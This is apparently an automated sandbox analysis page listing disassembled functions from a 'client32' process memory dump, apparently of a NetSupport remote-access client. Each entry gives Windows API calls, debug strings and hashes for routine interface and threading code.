LoadCursorA.USER32(00000000,00007F00,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9531
SetCursor.USER32(00000000), ref: 110B9538

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$RectWindow$ClientForegroundLoadScreen
String ID:
API String ID: 3235510773-0
Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4

Function 11139960 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

"Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
UI.CPP, xrefs: 111399BD
De-Initing VolumeControl Subsystem..., xrefs: 11139994
De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
API String ID: 1808733558-973815363
Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795

Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?,?,00000000,756F110C,?,1100BF9B,?,00000000,00000002), ref: 1100B350
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8

Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB

waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B3B8
LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
_free.LIBCMT ref: 1100B3C8
_free.LIBCMT ref: 1100B3CE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64

Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110792D5
m_hWnd, xrefs: 110792DA
idata->pButtonInfo, xrefs: 1107928B
..\ctl32\Coolbar.cpp, xrefs: 11079286, 110792AC
iTab >= 0 && iTab < idata->pButtonInfo->m_iCount, xrefs: 110792B1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
API String ID: 2776021309-3012761530
Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5

Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D66E
LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
RegisterClassExA.USER32 ref: 1101D6F1
GetLastError.KERNEL32 ref: 1101D6F7

Strings

0, xrefs: 1101D67C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99

Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100339D
GetSubMenu.USER32(00000000,00000000), ref: 110033C3
DestroyMenu.USER32 ref: 110033F2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 110033AE, 110033D4
hMenu, xrefs: 110033B3
hSub, xrefs: 110033D9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9

Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100348D
GetSubMenu.USER32(00000000,00000000), ref: 110034B3
DestroyMenu.USER32 ref: 110034E2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100349E, 110034C4
hMenu, xrefs: 110034A3
hSub, xrefs: 110034C9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9

Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
CloseHandle.KERNEL32(00000000), ref: 11027614
FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
String ID:
API String ID: 2375713580-0
Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91

Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
CloseHandle.KERNEL32(00000000), ref: 1113D829
CloseHandle.KERNEL32(00000000), ref: 1113D83C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateEventHandle$ObjectSingleThreadWait
String ID:
API String ID: 414154005-0
Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54

Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 111715AE

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__amsg_exit.LIBCMT ref: 111715CE
__lock.LIBCMT ref: 111715DE
InterlockedDecrement.KERNEL32(?,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 111715FB
_free.LIBCMT ref: 1117160E
InterlockedIncrement.KERNEL32(003418E0,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 11171626

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6

Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
CloseHandle.KERNEL32(?), ref: 110B3585
CloseHandle.KERNEL32(?), ref: 110B3598
CloseHandle.KERNEL32(?), ref: 110B35A5
WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
CloseHandle.KERNEL32(?), ref: 110B35D0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2857295742-0
Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60

Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
